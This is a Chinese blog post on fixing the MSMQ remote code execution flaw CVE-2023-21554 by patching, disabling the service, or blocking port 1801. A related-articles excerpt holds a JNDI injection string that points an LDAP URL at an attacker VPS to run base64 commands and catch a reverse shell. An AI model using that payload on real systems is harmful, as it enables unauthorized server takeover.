【Microsoft Message Queuing远程代码执行漏洞(CVE-2023-21554)漏洞修复】

最新推荐文章于 2024-07-03 12:01:44 发布
最新推荐文章于 2024-07-03 12:01:44 发布
阅读量8.8k 收藏 10
点赞数 2
分类专栏: 漏洞修复 文章标签: microsoft windows 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/131170419
版权

文章目录

一、漏洞描述

Windows 消息队列服务是一个Windows组件,需要系统启用该组件才能利用此漏洞,该组件可以通过控制面板添加。Microsoft Message Queuing中存在远程代码执行漏洞,未经身份验证的远程攻击者通过向MSMQ服务器发送特制的恶意MSMQ数据包触发此漏洞,最终实现在服务器端远程代码执行,且无需用户交互。CVSS评分9.8。

二、修复方案

官方通告链接:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554

修复建议(任选一种即可):
1.下载漏洞修复补丁
访问官方通告链接:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554
根据操作系统版本下载补丁,修复漏洞
在这里插入图片描述

2.关闭MSMQ服务,以此关闭攻击通道
打开控制面板->程序和功能->启用或关闭Windows功能 ->禁用Microsoft消息队列(MSMQ)服务器
在这里插入图片描述

3.配置防火墙规则禁用1801/TCP连接
打开windows防火墙->高级设置->入站规则->新建规则->禁用1801/TCP连接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

重启即可修复

一纸-荒芜
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
OpenQueue - message queuing protocol-开源
05-07
这一点与商业解决方案如IBM的MQSeries或微软的MSMQ类似,但OpenQueue的最大优势在于其开源特性,这意味着用户可以自由地查看、使用、修改和分发源代码,促进了社区的发展和定制化需求的满足。 消息队列的核心概念...
Microsoft Message Queuing介绍
tyrone的专栏
09-26 7145
http://msdn2.microsoft.com/en-us/library/ms711472.aspx<spanlang=EN-US style=mso-fareast-font-family:SimSun;mso-fareast-language:ZH-CN><spanstyle=mso-element:field-begin> TOC/o "1-3" /h
Windows Server 2012 R2服务器Microsoft 消息队列远程代码执行漏洞CVE-2023-21554补丁KB5025288的安装及问题解决
forestqq的博客
07-28 3523
近日,系统安全扫描中发现Windows Server 2012 R2服务器存在Microsoft 消息队列远程代码执行漏洞。本文记录补丁安装中遇到的“此更新不适用于你的计算机”问题及解决办法。
阿一网络安全培训第60天——Apache Druid RCE漏洞复现及修复(CVE-2023-25194) ​​​​​​​
Ayixy的博客
05-24 653
2.使⽤ldap://vps ip:1389/Basic/Command/Base64/[base64_encoded_cmd]进⾏攻击。Kafka 是⼀个开源的分布式消息系统,Kafka 可以处理⼤量的消息和数据流,具有⾼吞吐量、低延迟、java -jar JNDIExploit-1.0-SNAPSHOT.jar:监听,可反弹shell。的特点,⼴泛应⽤于实时监控、事件驱动分析、⽤户⾏为分析、⽹络安全等领域。JNDI注⼊漏洞,可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个。
Microsoft Message Queuing Remote Code Execution Vulnerability
par@ish的博客
08-23 439
MicroSoft Message Queuing(微软消息队列)是在多个不同的应用之间实现相互通信的一种异步传输模式,相互通信的应用可以分布于同一台机器上,也可以分布于相连的网络空间中的任一位置。它的实现原理是:消息的发送者把自己想要发送的信息放入一个容器中(我们称之为Message),然后把它保存至一个系统公用空间的消息队列(Message Queue)中;本地或者是异地的消息接收程序再从该队列中取出发给它的消息进行处理。
探索CVE-2023-21554漏洞 PoC:技术解析与应用
gitblog_00081的博客
04-22 449
探索CVE-2023-21554漏洞 PoC:技术解析与应用 项目地址:https://gitcode.com/zoemurmure/CVE-2023-21554-PoC 在信息安全领域,了解并应对最新的安全漏洞至关重要。 CVE-2023-21554 是一个近期发现的安全漏洞,而GitCode上的 Zoemurmure 开发者分享了关于此漏洞的Proof-of-Concept(PoC)代码。本...
Microsoft Message Queue(MSMQ:微软消息队列)简介
BigFamer的博客
10-14 3113
最近在安装公司的一个产品时,接触到了MSMQ,在此对MSMQ做一个简单的介绍,以便各位能对它有一个快速、直观的认识。本文针对于Microsoft Message Queue,以下提到的消息队列均指代Microsoft Message Queue。
漏洞Microsoft MessageQueuing service(MSMQ)
ptsecurity的博客
05-03 1528
漏洞只有在 Message Queuing 服务被启用时才能被利用,默认情况下它是被禁用的。早先发现的一些服务漏洞已经收到了公开的利用方法。如果安装了最新的知识库更新,脆弱的资产将被自动识别。📍 为了减少可能的利用,确保该服务不能从外部网络访问 - 这可以通过从外部网络扫描TCP 1801端口来验证(可以通过服务名称mqsvc来跟踪启用的服务的存在);MSMQ是一种应用程序之间的消息队列管理服务。为了利用该漏洞,攻击者可以向MSMQ服务器发送一个特殊的MSMQ数据包,并能够远程执行命令。
WuThreat身份安全云-TVD每日漏洞情报-2023-04-14
wuthreat无胁科技的博客
04-14 446
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-29059,CNNVD-202303-2681。
微软消息队列-MicroSoft Message Queue(MSMQ)队列的C#使用
每天都有新发现
01-21 1332
什么是MSMQ Message Queuing(MSMQ) 是微软开发的消息中间件,可应用于程序内部或程序之间的异步通信。主要的机制是:消息的发送者把自己想要发送的信息放入一个容器中(我们称之为Message),然后把它保存至一个系统公用空间的消息队列(Message Queue)中;本地或者是异地的消息接收程序再从该队列中取出发给它的消息进行处理。下图展...
ms05-017漏洞原理与复现
weixin_34250434的博客
09-13 1208
漏洞描述 此漏洞由lds-pl.net漏洞研究组在2003年7月16日发现,漏洞及exp在网上公开后,网上出现了大量的×××实例,利用此漏洞的蠕虫也大量出现。 漏洞编号 CVE-2005-0059 OSVDB-15458 MSB-MS05-017 BID-13112 ×××目标 DCOM接口的服务器端 影响系统 Microsoft Windows XP Service Pack 1 ...
msmq 之端口开放问题
iteye_12404的博客
10-17 2428
项目中需要用java访问远端的msmq,从网上找了一个开源的实现: http://msmqjava.codeplex.com 使用上一波三折,经过分析验证,打开队列采用不同的AccessMode,会决定访问远端的不同接口,佩服微软提供的API,竟然有如此威力。   现记录下分析的主要内容,以备查找。   MSMQ端口 http://support2.microsoft.com/k...
221208-11MessageQueuing(初识消息队列)
12-08
消息队列(Message Queuing,简称MQ)是现代软件架构中的关键组件,它在系统间提供了异步通信的能力,降低了服务间的耦合性,并提高了系统的响应速度和可伸缩性。在本文中,我们将深入探讨如何使用Redis分布式缓存...
pg-amqp-bridge:从PostgreSQL发送消息到RabbitMQ
02-05
RabbitMQ则是基于AMQP(Advanced Message Queuing Protocol)协议的消息代理,作为消息中间件,它接收、存储并转发消息,使得应用之间可以进行非阻塞通信。 AMQP是一种标准的消息协议,它定义了消息的格式以及生产...
Queuing-system-simulation-.rar_仿真_排队_排队系统
07-15
这里的“Queuing-system-simulation-.rar”压缩包显然包含了一个关于排队系统仿真的代码实现。以下是对这个主题的详细解释: 排队理论是运筹学的一个分支,它研究在服务设施(如银行、医院、餐馆等)中等待服务的...
常见危险端口服务及对应的漏洞
热门推荐
谢公子的博客
12-03 2万+
20:FTP服务的数据传输端口 21:FTP服务的连接端口,可能存在 弱口令暴力破解 22:SSH服务端口,可能存在 弱口令暴力破解 23:Telnet端口,可能存在 弱口令暴力破解 25:SMTP简单邮件传输协议端口,和 POP3 的110端口对应 43:whois服务端口 53:DNS服务端口(TCP/UDP 53) 67/68:DHCP服务端口 69:TFTP端口,可能存在...
MSMQ常用操作
weixin_30414155的博客
12-17 195
1 . 消息队列路径 C:\Windows\System32\msmq 2 . 清除消息队列中消息 Powshell:Get-MsmqQueue -Name "asmmq" | Clear-MsmqQueue PS C:\> Get-MsmqQueue -Name "Order*" -QueueType Public | Remove-MsmqQue...
7月1日微软关店!什么信号?
最新发布
知行职场
07-03 441
大家可能看到这条新闻,从7 月 1 日起,微软将关闭中国地区的所有线下授权门店。只留下网上商城和京东店。微软官方回应,根据客户不断变化的需求,评估零售策略,已决定对中国大陆市场的渠道进行整合。大家有没有觉得很久没去微软店里逛了?其实微软的硬件产品销量一直不温不火,不足以支持线下门店的运营。试想一下,一个门店光是租金和人员工资就是一笔不小的开销,要是销量不好,那是天天在烧钱啊!微软这次决定撤退,也算...
C# 怎么远程访问MicroSoft Message Queuing
02-28
C is a general-purpose programming language that was originally developed at Bell Labs by Dennis Ritchie in the early 1970s. It is a compiled language, which means that programs written in C are translated into machine code that can be executed directly by a computer's processor. C is known for its efficiency, low-level access to memory, and wide range of applications, including operating systems, device drivers, and embedded systems. C is a procedural language, which means that programs written in C are organized into functions that perform specific tasks. C is also a structured language, which means that programs written in C are organized into logical blocks of code that can be easily understood and maintained. C has a relatively small set of keywords and a simple syntax, which makes it easy to learn and use. However, C does require careful attention to detail and a good understanding of computer architecture, memory management, and data types in order to write correct and efficient programs. C has been highly influential in the development of many other programming languages, including C++, Java, and Python. Many modern operating systems, including Unix and Linux, are written in C or a variant of C. C remains a popular language for systems programming and for applications that require low-level control over hardware resources.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值